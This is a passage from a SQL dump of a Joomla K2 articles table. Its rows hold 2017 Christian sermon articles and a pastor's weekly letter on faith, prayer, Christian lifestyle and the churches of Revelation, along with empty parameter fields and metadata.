'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(22, 'How To Be a Correct Christian in a World of Pollution and  Mixtures (Part 2)', 'correct', 2, 1, '<p> THE ROLES A TRUE CHRISTIAN MUST PLAY: Romans 12:1-2</p>\r\n<p>Last  week,  we  studied on the problems that plague today\'s Christians and your duties in this world of pollution and mixtures. There is an urgent need for Christians to wake up to their responsibilities and stop creating confusions. There no longer exists a clear demarcation between most Christians and the rest of the world.</p>\r\n', '\r\n<p>Let me ask you this question;  are you a Thermometer Christian or a Thermostat Christian? Do you change the world around you or you end changing into the world around you? Ask yourself this morning. As we\'ve seen so far, we as Christians  are to represent  God\'s glory to the world, and in doing this, there are many roles God expects us to play  on earth.  Let go a little further today by looking  at the roles  a true Christian  should play:</p>\r\n<p><strong>1.You Are To Be A Man/Woman Of Great  Faith</strong>. Hebrews 11:3, Romans 10:17 ,John 5: 14-15</p>\r\n<p>In the bible, we hear many stories of great men of faith and men of great faith. As Christians,   God has called  us to function as men of great  faith  in the  world.  Faith  is the  basic  foundation  on which Christianity    rests.  Faith  is  the  structure   on which  we stand  as Christians;   it  is by faith that we can properly accept God\'s   word through the Bible,  through His servants and directly to our hearts.  A Christian  who doesn\'t  walk in faith is like a man who doesn\'t  know he\'s a human being and spends his life living like an animal. Another reason we need faith  is because it is our prescribed  means ofliving on the earth Habakkuk  2:7  says \"Behold, his soul which is lifted up is not upright in him: But the just  shall live by his faith.\"  Everything you  need  to fulfill  your  divine  destiny  to the  fullest  is  already available  for you. All you need to do is to reach out in faith and claim it. a look at how to acquire  and develop  our faith. Start  putting  faith  into  practice.  Consider   this, if you want to learn how to drive and all you do is spend your time reading the Theory of Driving,  you\'ll  never really  know how to drive until you get out yourself and drive  a car. So also,  to develop  your faith,  you must learn  to put everything  you\'ve heard  into practice  in your daily activities.</p>\r\n<p><strong>2.You are To Be A Minister Of The Gospel</strong></p>\r\n<p>To be  a minster  of the  gospel   doesn\'t  necessarily  mean  you\'ll officially become a pastor, but like we saw in the previous chapter, every Christian  was given the primary commission  to win souls  for Him,  wherever  they find themselves  on the face of the earth. The descriptions  of this  role can be found in Matthew  28:19-20   and Mark  16:15-18.    This  point  was  dealt   extensively   with  in  the previous  chapter.</p>\r\n<p><strong>3 .You Are To Be An Intercessor.Ephesians 6:18</strong></p>\r\n<p>No matter where you find yourself on the face of the earth,  you must be   ready   to  pray   always.    Prayer   is   the   primary    tool   of communication  with God  for us as Christians  and  it\'s extremely important  for  you  to  develop  your  intercessory   ability.  As a Christian,   it  is  your  responsibility   to  intercede  for your  fellow Christians,   church,  family,  friends,   town,  state,  nation,   and when God leads,  people you don\'t  even know. A good intercessor  needs high spiritual  stamina  and the only way to get that stamina  is by praying  now. The more you engage in  intercession,   the stronger your \'intercessory  muscles\' develop. Don\'t spare yourself. Take intercession   serious,  you\'ll  never know when a loved  one needs your prayer  urgently.  And you really cannot give what you don\'t have.</p>\r\n<p><strong>4. YouAre To Be A Leader.</strong></p>\r\n<p>No matter what your position  at church or at your place  of work is, God has called you to lead  in a capacity somewhere  and sometime  to a degree. You must remember  that there is  a difference  between those who lead and those who are in leadership.  Those who are in leadership have the title but may not necessarily  be the ones leading  everyone, but those who lead are those  who have taken their development   process serious and now have the capacity, spiritual  wisdom,  spiritual  depth and sensitivity to lead others. In every situation,  it\'s the man who knows what to do that will end up leading everyone else. How do you prepare  yourself for leadership?  Simple and straightforward: take your church  membership  serious.  Don\'t shy away from any assignment  given to you by your pastor,  instead  embrace  it wholeheartedly.   Effective followership   of the leadership  structure  in your church ignites  the fire ofleadership dormant in your heart.</p>\r\n<p><strong>5. You Are To Be A Soldier. Ephesians  6:10-18</strong></p>\r\n<p>We are at war. Christianity  is an active warfare  against the devil and his cohorts not a \"Sunday Fashion Contest:\'  The devil  hates you, he hates God and wants  to ruin  your life and the worst thing  you can do  as a soldier  is to approach a battlefield  unaware and unprepared for the war on ground.  Sadly enough,  this  is  how most of Christians   are. Let us look  at what Paul  says in Ephesians   6 about warfare.</p>\r\n<p>The key points  from the above scripture are:</p>\r\n<ol>\r\n<li>You need to be prepared to stand against the wiles of the devil.</li>\r\n<li>We wrestle against principalities and powers not human beings.</li>\r\n<li>There  would  be an \"evil day\" when it seems like all hell just broke loose  in your direction  and you must be able  to withstand   in  that day. To conduct spiritual   warfare properly,  you must arm yourself  with</li>\r\n<li>the  following  things;  truth,  righteousness,  the gospel  of peace, FAITH,  salvation  and God\'s word. All  these things work hand in hand to help you effectively conduct spiritual  warfare.</li>\r\n<li>Lastly, you must take your prayer life very serious.   Develop   the</li>\r\n<li>stamina to be able to pray for a long time by praying for long periods of time.</li>\r\n</ol>\r\n<p><strong>6. You Are To Be A Scholar</strong></p>\r\n<p>You must actively seek divine  knowledge, wisdom, and understanding.  The more scriptures  you know and can use, the more effective your faith  can be and the less likely  the devil is to lie to you concerning   something  God had already said in the scriptures.  The Bible says in Proverbs 23:23 \"Buythe truth, and sellit not; also wisdom, and instruction, and understanding.\"</p>\r\n<p>You must spend your money not only  on clothes, food, etc. but on things that will edify and nourish   your spirit such as Christian  tapes, books, music. Also you must actively seek truth, wisdom, divine instruction  and understanding. One way you can do this, that many Christians  have overlooked for a long time, is  the art of taking notes in Church.  A lot of people  take notes but like bad students, they never read them. Make a plan  to go through all your sermon notes and refresh your mind and spirit with the truth that abounds in those notes.</p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-02-05 21:39:29', 196, '', 0, '0000-00-00 00:00:00', '2017-02-12 10:18:50', 196, '2017-02-05 21:39:29', '0000-00-00 00:00:00', 0, 1, 10, 0, 2, '', '', '', '', 2328, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(23, 'From our Father\'s Heart (12/02/2017)', 'from-our-father-s-heart-12-02-2017', 2, 1, '<p>Dearly Beloved,</p>\r\n<p>Life has two sides, the  practical  side  and  the  prophetic side, and  you must  work  the  two  very  well  in these  days we are stepping into. When you get into a zone and it looks like there is destruction   ahead, you will need to take heed to the prophetic  at that  moment.  Handling  these  two sides  of life will help  us to know the difference between  the different  situations   and what to do at such instances.</p>\r\n', '\r\n<p>Isaiah   60:19   says rt   The sun shall be no more thy light by day; neither for brightness  shall the moon give light unto thee: but the Lord shall  be unto  thee an everlasting  light,  and thy  God  thy glory.\"Do you know what God is saying here? That is a prophecy that  a time will come  that what used to work normally will no longer  work. This is talking  of the time when what is normal  and usual  can\'t  face what  you are  facing. At such times,  men  are separated  from men:  some will go under, and some will go over. It is my declaration  that you will not be among those that will go under, but you will go over.</p>\r\n<p>When the Israelites   were in Egypt,  there was darkness  in Egypt but light in Goshen.  All the evil touching the Egyptians were not touching  them.  So any Egyptian that was wise would come to the Israelites   for help.  And God is saying this is the time  He wants to begin to draw the attention  of the world to His  children.  When Christians fail in life, it is not the name of Jesus  that failed; it was their faith that failed.</p>\r\n<p>God wants you to take along  this year the WAY OF FAITH.  If you take this  way, your sun won\'t  go down.  It sounds so simple  in teaching but it is not so in practice!   If you take the way of faith, you can only go up.  God will only meet you at the point of your faith. Faith is the currency  of the kingdom.  At the end of faith is always  someone   called  God,  and  at  the  end  of fear  is  also someone  called satan.  If you have fear, don\'t step out, otherwise the devil  is  going to mess you up bad!  Don\'t  step out  in  fear pretending  to be in faith. There will be a time  God will give you an opportunity  to declare your faith.  I  have not come to ask you to do something  stupid but to tell you the key that God is giving us for the days ahead. Don\'t  try to prepare  another  person\'s faith  but your own faith,  don\'ttry   to declare another  person\'s faith but your own faith.  Your faith  knows exactly  what you can deal  with now. Your faith  determines   the degree of the supernatural   experiences  you have. What is  delaying  you is not the devil, it is your faith.</p>\r\n<p>Most of you are used to salary  and we entering  into the days that the sun will no more be your light by day. Whatever  God gives you, you will take it first by faith before you take it by cash. You will do your natural  work, but what is the force that is backing and supporting  you? Just one day that fear adds to your time can add #lOmillion  to your cost.  Many people are sending  their  children  to a school  lesser  than  what  they actually  desire  because oflack of faith.</p>\r\n<p>You cannot take anything  that God gives you if you don\'t  take it by faith, how long will you keep postponing?  When are you going to take a decision and say, \"Lord, I  will take it now\"? What can your faith take?Thatis  where you will find God!</p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p>God\'s Servant</p>\r\n<p>Rev. Olusola  Areogun.</p>', NULL, NULL, '[]', '', '2017-02-12 07:37:40', 196, '', 0, '0000-00-00 00:00:00', '2017-02-19 19:09:18', 196, '2017-02-12 07:37:40', '0000-00-00 00:00:00', 0, 1, 11, 1, 1, '', '', '', '', 2028, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*');
INSERT INTO `y57u5_k2_items` (`id`, `title`, `alias`, `catid`, `published`, `introtext`, `fulltext`, `video`, `gallery`, `extra_fields`, `extra_fields_search`, `created`, `created_by`, `created_by_alias`, `checked_out`, `checked_out_time`, `modified`, `modified_by`, `publish_up`, `publish_down`, `trash`, `access`, `ordering`, `featured`, `featured_ordering`, `image_caption`, `image_credits`, `video_caption`, `video_credits`, `hits`, `params`, `metadesc`, `metadata`, `metakey`, `plugins`, `language`) VALUES
(24, 'How To Be a Correct Christian in a World of Pollution and  Mixtures (Part 3)', 'correct-christian', 2, 1, '<p>SUBTITLE: THE IDEAL LIFESTYLE FOR A CHRISTIAN. - Romans 12:1-2</p>\r\n<p>Now that we\'ve dealt with the spiritual duties of a Christian, we need to focus on the lifestyle of a true Christian. This is the point at which you differentiate yourself from the world and show them through the way you live your life what it means to be a Christian and how much it pays to serve God.</p>\r\n', '\r\n<p>As a Christian, although your physical life isn\'t your primary focus, it is error to think it should be ignored either. Your lifestyle as a Christian should be an outflow of your spiritual life and personal walk with God. </p>\r\n<p>As a Christian you\'re expected to:</p>\r\n<p><strong>A. ACTING LIKE GOD</strong></p>\r\n<p>I’m aware this sounds like a daunting exercise, but what you probably didn\'t know is that this point is one of the easiest challenges you\'ll have to overcome as a Christian. Before we go too far, Let us take a look at what it means to act like God. Acting like God means to behave in the manner consistent with how God would behave in different situations you find yourself. Now, behaving in the manner God would behave implies the following:</p>\r\n<p><strong>i. You Must Carry Yourself in A Way God Approves. Romans 12:3</strong></p>\r\n<p>This means you carry yourself with respect, and a sense of confidence that God made you special. Be careful that you don\'t mistakenly step into pride because, God resists the proud. Also you mustn\'t carry yourself with any sense of inferiority. </p>\r\n<p>I want you to look closely at this statement in the above scripture “not to think of himself more highly than he ought to think but to think soberly.” You probably never noticed that the Bible didn\'t say “don\'t think highly of yourself.” It says don\'t think MORE HIGHLY than you ought to. Wow! That means WE ARE TO THINK HIGHLY OF OURSELVES because God made us special and He knows it, He has told us many times in the scriptures even David was confused about God\'s obsession with man in Psalm 8: 3-6.</p>\r\n<p><strong>ii. Your Dressing Must Be To Glorify God. </strong></p>\r\n<p>This not only applies to women but to men also. As a Christian man you can\'t afford to look rough, unkempt and wretched. God is clothed in glory and light and you must reflect that by putting on your best appearance at all times. For women, any dress that you know will make men think of sex rather than seeing God\'s glory in you shouldn\'t be found in your possession. Everything you wear must represent God\'s glory and bring glory to His name. As a Christian you can\'t appear seductive, rough, dirty, semi/quarter/three-quarter naked. You must always represent God in how you\'re dressed at all times.</p>\r\n<p><strong>iii. You Must Relate With People in Love. John 15:12, 1 Corinthians 13: 1-8</strong></p>\r\n<p>As a Christian, you must always treat others with love and respect. God is love and as a reflection of Him, you must also showcase that kind of love to the world. Take note however that this is not the kind of selfish love that leads to lust but rather a selfless love and compassion for a fellow man as seen when God gave His only begotten son to die for the sins of all men.</p>\r\n<p><strong>B. TALK LIKE GOD. Matthew 12:36-37</strong></p>\r\n<p>The next thing you need to do is to begin to talk like God. This is a very powerful point because God\'s power is in His word and God has given us that privilege to be able to call forth things that be not into existence through faith and the confession of our mouth. What you say will happen in your life, so watch your words closely. As a Christian you are expected to use your words as a tool for change in the world. Your words determine the outcome of your life therefore choose them carefully.</p>\r\n<p>The next thing about talking like God is, God doesn\'t engage in idle talk. God doesn\'t gossip, backbite or complain and as Christians you aren\'t expected to be found guilty of any of those things. If you\'re ever in a tight or unfavorable situation, instead of complaining, you should use your words to improve the situation by confessing what God has said in the scriptures concerning your life. </p>\r\n<p>As a Christian, your speech must consistently be prospering the kingdom of God and should be profitable. If you\'re ever in a situation in which you have nothing to say, start speaking in tongues. </p>\r\n<p>Your lingo must be clean and Godly. Majority of Christians today are so contaminated by worldly ways that unless they tell you directly that they are Christians, you won\'t be able to tell from their manner of speech. A lot of them use foul slangs and swear words that worldly people use. </p>\r\n<p><strong>C. THINK LIKE GOD Proverbs 23:7, Philippians 4:8-9, James 4:7</strong></p>\r\n<p>It\'s pretty obvious that you can\'t ever become like God until you start thinking like Him. As easy as this sounds, thinking like God is the toughest of the three things we looked at in becoming like God. The devil knows the danger that allowing you to think like God poses to him and he\'ll do everything in his power to stop you from thinking the right way. He\'ll bring all sorts of frustrating thoughts, negative or lustful thoughts. Fortunately for us, there is hope.</p>\r\n<p>The funny thing about people is that they tend to complicate matters when it comes to the devil. They tend to believe that when it comes to dealing with the devil, you have to follow a set of complex steps when all it really takes is to stand in your authority as a child of God and resist the devil. The best way to keep the devil away from your thoughts as seen in James 4:7 above, is to draw closer to God. The closer you are to God, the farther you are from the devil. </p>\r\n<p>Lastly, if you have anything in your life that gives the devil a legal foothold in your life to keep bothering you such as secret sins, and unbroken occultic covenants –especially because you consult some spiritual sources with practices that are not having precedence in the Bible- you must renounce and repent of them at once. </p>\r\n<p>Don’t give the devil an inch in your mind or your life.</p>\r\n<p><strong>Avoid the Danger Of Religiousness Matthew 15:7-9</strong></p>\r\n<p>When God created man, his main reason was to create people who would have personal fellowship with Him out of their own freewill. The danger of religiousness is that instead of realizing this, religious people tell themselves that all you need to please God and to be a successful Christian is to attend church on a regular basis, obey the Ten Commandments and other moral rules, and pray in a certain way. Although they think they’re pleasing God, they are actually making Him unhappy because God wants our Christianity to become much more than just obeying a set of rules, or trying to look as holy as possible in front of your peers and people. </p>\r\n<p>God wants your Christianity to be your lifestyle. What you say, eat and breathe, how you act all the time should reflect God’s nature. If not, you still have a lot of work to do. Even Jesus rebuked the Pharisees several times in the Bible for being religious hypocrites. God hates religion with no heartfelt personal relationship, and according to Jesus in the scripture above, those who practice religion at the cost of a personal relationship with Christ, worship God in vain.</p>\r\n<p>Another classic example of this issue is the story of Mary and Martha (Luke 10: 40-42) Jesus came to Mary and Martha’s house, and both of them showed two very different attitudes to the presence of the Lord Jesus Christ. Martha represents the religious Christian, while Mary took the role of the Christian that prioritized her personal relationship with God. When Martha was complaining to Jesus that Mary wasn’t helping her, Jesus made her realize that all those things she was doing although they were important, they were in no way as important as the main thing, which was listening to Him and fellowshipping with Him. The lesson behind this story is that if Mary had been like Martha, cooking and getting everything ready for Jesus, Jesus would have eaten the food and gone his way, but they would have missed the glorious opportunity to hear the master speak to them in person. That’s another danger of religiousness; it robs you of the glorious experiences you would have had if you had a personal relationship with God. </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-02-12 07:41:57', 196, '', 0, '0000-00-00 00:00:00', '2017-03-04 22:36:11', 196, '2017-02-12 07:41:57', '0000-00-00 00:00:00', 0, 1, 12, 1, 2, '', '', '', '', 3955, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(25, 'The Position that a Christian must take In these last days', 'the-position-that-a-christian-must-take-in-these-last-days', 2, 1, '<p>Rev 3:7-22, Mark 24: 3,4, 10-12</p>\r\n<p><strong>The Christians in Philadelphia :</strong> The Christians in Philadelphia are example true Christians who stand for God’s word and His name in these last days. They are said to have strength, they kept the word of God and there was nothing that could take the name of Jesus from their mouth. God’s Strength, the Word of God and the Name of Jesus are three major things that the devil has stolen from Christians’ lives today. And he has turned several churches to synagogue of Satan.</p>\r\n', '\r\n<p>These Christians have not denied him. They have not believed false teachers. They have had persecution, yet they have not said that they do not know their Lord. They have little strength. But they had achieved a great deal. They have really repented. God therefore, promised that they will become pillars in the temple of God (Rev. 3 v.12). This church may have been small in number or in material resources, but God was going to make them strong. They are promised an open door. In Scripture, an open door refers to an opening to preach the Gospel (Acts 5 v.19-20), and the rapture of the Church (Rev. 4 v.1). </p>\r\n<p>There is no difference, really, in someone who follows Satan and someone who pretends to be a Christian.  Both are lost. The \"synagogue of Satan\" is just a place of worship where God is not Lord. A body of Christians meeting could also be a synagogue of Satan, if the true Word of God is not taught and received. God’s judgment to such people is the hour of temptation. This refers to the Great Tribulation described in Mat. 24 vs 15-22.</p>\r\n<p>In these end times, God is opening many tremendous doors of opportunity and there is always an inherent danger of failing to advance at Christ\'s command. You may feel you have only a little strength, but God can make you a strong and mighty pillar in His Kingdom, a spiritual warrior who is able to walk through every door He opens. </p>\r\n<p>Let me ask you: What is holding you back from fulfilling God\'s call for your life? Is it fear, finances, your health, or challenges? Never give up in your Christian journey!</p>\r\n<p>The condition of a Backslidden Christian! Rev 3:14-22</p>\r\n<p>The church in Laodicea is a description of backslidden Christians. Those that have once been in faith but because of deceitfulness of riches and pride of life they lost the life of God. Their problem is that they do not know that God has left them. How many of us are living our lives with such assumption? Read Luke 2:43-44. </p>\r\n<p>The description of such kind Christians: Rev 3:17-18.</p>\r\n<p>1. Poor. Matthew 6:19-20. Your true wealth is in quantity of treasures you laid up in heaven. How much of you is being given unto the work of God. The Laodicea Christians have abandoned kingdom service for the earthly shows. </p>\r\n<p>2. Blind. Isaiah 43:8. Matthew 13:15-16. This is spiritual insensitivity.  Blindness to the things of God. </p>\r\n<p>3. Naked. Gen 2:16-17; 3:7-11. This is what happens to a man that violates divine instructions. The glory of the Lord covered Adam and Eve in the garden, but when they lost it they resulted to fig leaves, which could not cover their nakedness.</p>\r\n<p>The believers at Laodicea were spiritually lukewarm and Christ said their condition must be remedied. Jesus tells this church to get excited about serving Jesus and repent of their Luke warmness. When Jesus returns, we must be found working. Work for the night is coming when no man work. John 9:4.</p>\r\n<p> How do you know if you are lukewarm? Ask yourself these questions: </p>\r\n<p>- Are you committed to evangelism? </p>\r\n<p>- Are you committed to living a holy life? </p>\r\n<p>- Is your heart set on the things of God?</p>\r\n<p>- Are you committed to your local church services? </p>\r\n<p>- Are you committed to spending time in prayer, worship and the Word? </p>\r\n<p>- How serious do you take the assignments in your hand?</p>\r\n<p>- Among other…</p>\r\n<p>Behold, He stands at the door, knocking: if you can hear His voice, and open the door of your life, He will come in to you, and will dine with you. He does not want you to continue like this because He loves you. Start a fresh walk with God and it shall be well with you. </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-02-19 19:04:18', 196, '', 0, '0000-00-00 00:00:00', '2017-02-19 19:08:02', 196, '2017-02-19 19:04:18', '0000-00-00 00:00:00', 0, 1, 13, 0, 0, '', '', '', '', 16812, 